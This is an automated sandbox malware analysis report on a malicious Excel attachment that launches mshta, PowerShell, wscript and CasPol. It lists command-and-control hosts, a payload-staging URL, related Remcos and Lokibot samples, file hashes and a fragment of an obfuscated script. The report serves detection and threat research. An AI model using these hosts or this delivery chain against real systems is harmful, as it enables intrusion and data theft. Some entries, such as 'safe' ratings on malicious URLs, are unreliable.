                                                                                                                                                  https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://policies.yahoo.com/w3c/p3p.xmlbhvD598.tmp.30.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.msn.com/advertisement.ad.jsbhvD598.tmp.30.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://3105.filemail.compowershell.exe, 0000000F.00000002.512617659.00000000023F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.544414000.00000000024C2000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFC:powershell.exe, 00000005.00000002.454661113.000000001C25F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.493454203.000000001C1C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.ebuddy.comCasPol.exe, CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
193.30.119.205 | ip.3105.filemail.com | unknown | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true
198.244.140.41 | provit.uk | United States | 18630 | RIDLEYSD-NETUS | false
31.13.224.72 | newbeggin.duckdns.org | Bulgaria | 48584 | SARNICA-ASBG | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
172.234.205.135 | unknown | United States | 20940 | AKAMAI-ASN1EU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562330
Start date and time: 2024-11-25 14:05:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OC25-11-24.xls
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winXLS@45/43@16/5
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 71.4%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 99%
                                                                                                                                                            • Number of executed functions: 155
                                                                                                                                                            • Number of non-executed functions: 321
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .xls
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Active ActiveX Object
                                                                                                                                                            • Active ActiveX Object
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer
                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 3060 because there are no executed function
                                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 3652 because there are no executed function
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                            • VT rate limit hit for: OC25-11-24.xls
| Time | Type | Description |
|---|---|---|
| 08:06:36 | API Interceptor | 154x Sleep call for process: mshta.exe modified |
| 08:06:42 | API Interceptor | 650x Sleep call for process: powershell.exe modified |
| 08:06:53 | API Interceptor | 26x Sleep call for process: wscript.exe modified |
| 08:07:22 | API Interceptor | 1069017x Sleep call for process: CasPol.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 198.244.140.41 | Shipping Document.xls | malicious | HTMLPhisher | |
| 198.244.140.41 | P0-4856383648383364838364836483.xls | malicious | Unknown | |
| 198.244.140.41 | P0-4856383648383364838364836483.xls | malicious | Unknown | |
| 198.244.140.41 | P0-4856383648383364838364836483.xls | malicious | Unknown | |
| 198.244.140.41 | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | |
| 198.244.140.41 | pi-77159.xls | malicious | Remcos, HTMLPhisher | |
| 198.244.140.41 | Transferencia SPEI.xls | malicious | FormBook, HTMLPhisher | |
| 198.244.140.41 | PO-000041492.docx.doc | malicious | Lokibot | |
| 198.244.140.41 | Credit_DetailsCBS24312017918.xla.xlsx | malicious | HTMLPhisher | |
| 198.244.140.41 | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | |
| 178.237.33.50 | 0Xp3q1l7De.exe | malicious | Remcos | geoplugin.net/json.gp |
| 178.237.33.50 | PO_203-25.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp |
| 178.237.33.50 | comprobante.exe | malicious | Remcos | geoplugin.net/json.gp |
| 178.237.33.50 | segura.vbs | malicious | Remcos | geoplugin.net/json.gp |
| 178.237.33.50 | Cargo Invoice_pdf.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp |
| 178.237.33.50 | Synliggre.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp |
| 178.237.33.50 | eBHn6qHPLz.exe | malicious | Remcos | geoplugin.net/json.gp |
| 178.237.33.50 | eBHn6qHPLz.exe | malicious | Remcos | geoplugin.net/json.gp |
| 178.237.33.50 | mCtN05kxh6.exe | malicious | Remcos | geoplugin.net/json.gp |
| 178.237.33.50 | Bank Fund Transfer-589237.scr.exe | malicious | Remcos | geoplugin.net/json.gp |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| provit.uk | Shipping Document.xls | malicious | HTMLPhisher | 198.244.140.41 |
| provit.uk | P0-4856383648383364838364836483.xls | malicious | Unknown | 198.244.140.41 |
| provit.uk | P0-4856383648383364838364836483.xls | malicious | Unknown | 198.244.140.41 |
| provit.uk | P0-4856383648383364838364836483.xls | malicious | Unknown | 198.244.140.41 |
| provit.uk | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 198.244.140.41 |
| provit.uk | pi-77159.xls | malicious | Remcos, HTMLPhisher | 198.244.140.41 |
| provit.uk | Transferencia SPEI.xls | malicious | FormBook, HTMLPhisher | 198.244.140.41 |
| provit.uk | PO-000041492.docx.doc | malicious | Lokibot | 198.244.140.41 |
| provit.uk | Credit_DetailsCBS24312017918.xla.xlsx | malicious | HTMLPhisher | 198.244.140.41 |
| provit.uk | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 198.244.140.41 |
| geoplugin.net | 0Xp3q1l7De.exe | malicious | Remcos | 178.237.33.50 |
| geoplugin.net | PO_203-25.exe | malicious | Remcos, GuLoader | 178.237.33.50 |
| geoplugin.net | comprobante.exe | malicious | Remcos | 178.237.33.50 |
| geoplugin.net | segura.vbs | malicious | Remcos | 178.237.33.50 |
| geoplugin.net | Cargo Invoice_pdf.vbs | malicious | Remcos, GuLoader | 178.237.33.50 |
| geoplugin.net | Synliggre.vbs | malicious | Remcos, GuLoader | 178.237.33.50 |
| geoplugin.net | RFQ Nr. 201124559-201124569-201175771.com.exe | malicious | Remcos, GuLoader | 178.237.33.50 |
| geoplugin.net | eBHn6qHPLz.exe | malicious | Remcos | 178.237.33.50 |
| geoplugin.net | eBHn6qHPLz.exe | malicious | Remcos | 178.237.33.50 |
| geoplugin.net | mCtN05kxh6.exe | malicious | Remcos | 178.237.33.50 |
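| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | http://www.kalenderpedia.de | malicious | Unknown | 141.95.33.120 |
| DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | zgp.elf | malicious | Mirai | 134.96.92.247 |
| DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | powerpc.nn.elf | malicious | Mirai, Okiru | 141.56.86.222 |
| DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | mipsel.nn.elf | malicious | Mirai, Okiru | 139.30.61.5 |
| DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | sh4.nn.elf | malicious | Mirai, Okiru | 141.67.203.57 |
| DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | arm7.nn.elf | malicious | Mirai, Okiru | 141.14.92.147 |
| DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | x86_64.nn.elf | malicious | Mirai, Okiru | 132.199.99.101 |
| DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | sora.m68k.elf | malicious | Mirai | 134.245.99.20 |
| DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | sora.sh4.elf | malicious | Mirai | 139.21.35.28 |
| DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | sh4.nn.elf | malicious | Mirai, Okiru | 149.222.54.7 |
| SARNICA-ASBG | n5QCsKJ0CP.exe | malicious | RedLine | 31.13.224.34 |
| SARNICA-ASBG | ahmbf.ps1 | malicious | Unknown | 31.13.224.69 |
| SARNICA-ASBG | Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 93.123.109.168 |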
                                                                                                                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                • 93.123.109.168
                                                                                                                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                • 93.123.109.168
                                                                                                                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                • 93.123.109.168
                                                                                                                                                                                mitradesignworkgoodforeveryoneforgiftedmbestthings.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                                                • 31.13.224.230
                                                                                                                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                • 93.123.109.168
                                                                                                                                                                                09_deb64ed.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • 31.13.224.230
                                                                                                                                                                                2024-HRDCL-0000796.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                • 31.13.224.230
                                                                                                                                                                                RIDLEYSD-NETUSShipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Transferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                • 198.244.140.41
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                No context
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4742
                                                                                                                                                                                Entropy (8bit):4.8105940880640246
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                                                                                                                MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                                                                                                                SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                                                                                                                SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                                                                                                                SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:@...e...........................................................
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):122996
                                                                                                                                                                                Entropy (8bit):2.3223020977577686
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:4dEoviHeU1iQsHez/1iQ9r/RSYS0vZzdHerHe51iQ0HeT4rQ:bo6e8iQYeztiQCl0ne7ePiQwekc
                                                                                                                                                                                MD5:D9462EBEF35CAD5FB5CBA7E663570C9C
                                                                                                                                                                                SHA1:AC56E9C1201ABC8EC123A0C59FD2B419DE1158A7
                                                                                                                                                                                SHA-256:792DC91C55F0142C1C1EF561296AC3303C200402DCE73668636088D601997B33
                                                                                                                                                                                SHA-512:E3662833A25C8ABDAC4E98183E3DFFEC417A3A59A8398A4CE2433B197C0237835161A4EADC8222408D50A1C2E9A5DF3A09060EB066810D6E137D454CD3B8EFF7
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].hta, Author: Joe Security
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (378), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):142260
                                                                                                                                                                                Entropy (8bit):3.6754384164261458
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:kWgwsSmx5nYZjuEoBz/Ib3qBgnM4zBkzLSCL/egt5pzWGwm:pBuYZjubgL6gnMmSfSCLGgt5pyGwm
                                                                                                                                                                                MD5:3EB10EDFAAA09C17D81B1DA5B336684B
                                                                                                                                                                                SHA1:13D5D78340551543986CB92DAB870D552287745B
                                                                                                                                                                                SHA-256:C5F2960ED833EABA3A8B95A0F4253EFBE1A7FD96E303D1731EBCB7E0E54623C8
                                                                                                                                                                                SHA-512:7758740C6663B603F4DB1BDCEA22F89F5C307E93754164C3CBC7F8FCCE7CF7B9E2A251F07522EC6DB8488C4D7FC78BCE6A83B47EFE57436E2E1ACF88F7FE9930
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:..........o.e.c.L.L.i.L.W.W.N.i.W.j.e.L. .=. .".z.Z.Z.z.C.G.I.W.r.W.d.L.K.q.P.".....G.q.u.I.P.W.h.o.G.Z.h.P.i.L.P. .=. .".k.t.z.Z.q.x.K.z.A.G.g.N.b.B.L.".....c.g.p.j.P.P.N.h.K.u.q.e.L.k.t. .=. .".W.A.S.h.W.I.z.L.c.c.K.h.t.P.z.".....x.C.W.Z.q.o.L.i.k.s.P.m.G.i.q. .=. .".W.K.P.L.L.O.W.d.n.G.p.K.L.p.W.".....b.i.q.x.G.K.G.S.m.c.U.i.L.T.K. .=. .".G.W.c.K.L.L.n.n.k.N.A.G.t.h.A.".....P.i.l.h.e.W.R.A.c.K.L.L.H.k.p. .=. .".K.A.W.I.m.e.P.x.L.e.W.i.W.a.u.".........U.u.i.L.i.L.L.L.W.h.m.p.b.Z.j. .=. .".q.A.e.i.v.h.L.t.B.K.A.h.m.G.x.".....L.b.W.o.o.e.z.L.v.G.G.k.p.L.L. .=. .".d.K.a.K.W.u.u.z.L.o.z.f.c.l.e.".....P.p.G.f.z.i.z.Q.G.G.l.k.L.n.u. .=. .".f.i.W.p.Z.W.o.m.l.c.h.J.Q.x.c.".........W.q.p.L.J.L.n.W.h.Q.c.U.e.i.P. .=. .".i.H.h.f.k.W.G.N.W.i.L.W.z.P.i.".....d.W.z.c.h.u.R.Z.m.W.Z.W.W.l.A. .=. .".S.L.t.H.W.m.J.i.e.W.N.k.e.P.c.".....d.i.t.K.m.q.x.W.q.L.j.K.K.L.i. .=. .".L.d.I.K.G.p.o.k.L.q.h.c.o.j.m.".....L.W.q.P.H.q.b.t.n.e.s.W.g.h.f. .=. .".O.W.N.W.S.U.O.Z.A.W.W.K.S.m.G.".....l.u.K.o.n.t.P.J.P.e.
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                Entropy (8bit):5.01360365253241
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:tkluQ+nd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluQydbauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                MD5:04B89191DF339BF9301F6DDC244CE66B
                                                                                                                                                                                SHA1:5E2663E97EFF9ED920A21A1DC6B30254052D5488
                                                                                                                                                                                SHA-256:423447CC5328815B686DE0A284415943D2168F2408BD2F76C067626FC2D6CA9F
                                                                                                                                                                                SHA-512:D6832DD9147DD08489B97591B35DAA6F127EFE20EDE2A802CF90D84A54F358604D5856C8ACC68B42D2AD2DBADDA2F834292888E865C8A7EA2E9464EED34C61E1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:PNG image data, 731 x 391, 8-bit/color RGB, interlaced
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):114223
                                                                                                                                                                                Entropy (8bit):7.9934212565976415
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:1536:cX9THBYT6A17j6ZE4+ZVkVIXMK7MpNc+Bj5uuUBQp12RTmmPHFSTm:QTHBq6U/6xVsMKgpNc+ZwuURRTd9STm
                                                                                                                                                                                MD5:7F72BA3C4366E5F9603DC0FE9C70D4E4
                                                                                                                                                                                SHA1:FA3DACFB4E2ECA8BFAFCCE8BE5ADE7EE7B3722F1
                                                                                                                                                                                SHA-256:4BD578FBCFC208744CFEC575FEC397A77AF66D5688E0C3CD034B4628EFDF910A
                                                                                                                                                                                SHA-512:B8B7B8D4441609F64AF477301355BC8DAE84A16EA595A4923391530F2EE6F4B3F85437541F6408398593D3E1223B56FFCEBEB119C43D97C6213C640799CA6863
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):582936
                                                                                                                                                                                Entropy (8bit):3.2760774222297435
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:H3sSWYG7THUSEWkMiXE0PwJy/O9ofOy4RSBkYPVnAmN7NMoOFub57NVrNGD5cy/G:H8EGr1wwJymeoSpVnAwfASlNidri2/ON
                                                                                                                                                                                MD5:BB7E0B7055A570167131B2B6861CB461
                                                                                                                                                                                SHA1:0EC5EA433B59E04BD571B763785AD6C78C3D510E
                                                                                                                                                                                SHA-256:E9AD1DC6FD3237803D6B2BA631DA5D70593655E5BAD780E9C383F6509D2B1C3F
                                                                                                                                                                                SHA-512:D3B533C16661C6FD18F3662C6A7257A4771EF27EEDE8F81D69F343EBB511BE99225F336EA357002F0E7EE2A4CD39E53A811527C5A9C928A76D553628501D91A3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):582936
                                                                                                                                                                                Entropy (8bit):3.2760774222297435
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:H3sSWYG7THUSEWkMiXE0PwJy/O9ofOy4RSBkYPVnAmN7NMoOFub57NVrNGD5cy/G:H8EGr1wwJymeoSpVnAwfASlNidri2/ON
                                                                                                                                                                                MD5:BB7E0B7055A570167131B2B6861CB461
                                                                                                                                                                                SHA1:0EC5EA433B59E04BD571B763785AD6C78C3D510E
                                                                                                                                                                                SHA-256:E9AD1DC6FD3237803D6B2BA631DA5D70593655E5BAD780E9C383F6509D2B1C3F
                                                                                                                                                                                SHA-512:D3B533C16661C6FD18F3662C6A7257A4771EF27EEDE8F81D69F343EBB511BE99225F336EA357002F0E7EE2A4CD39E53A811527C5A9C928A76D553628501D91A3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Mon Nov 25 13:06:47 2024, 1st section name ".debug$S"
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1324
                                                                                                                                                                                Entropy (8bit):3.975057244644361
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:HnM69OxmnF/dHdwKdNWI+ycuZhNskakSVpPNnqSud:HYSbeKd41ulNa3xqSu
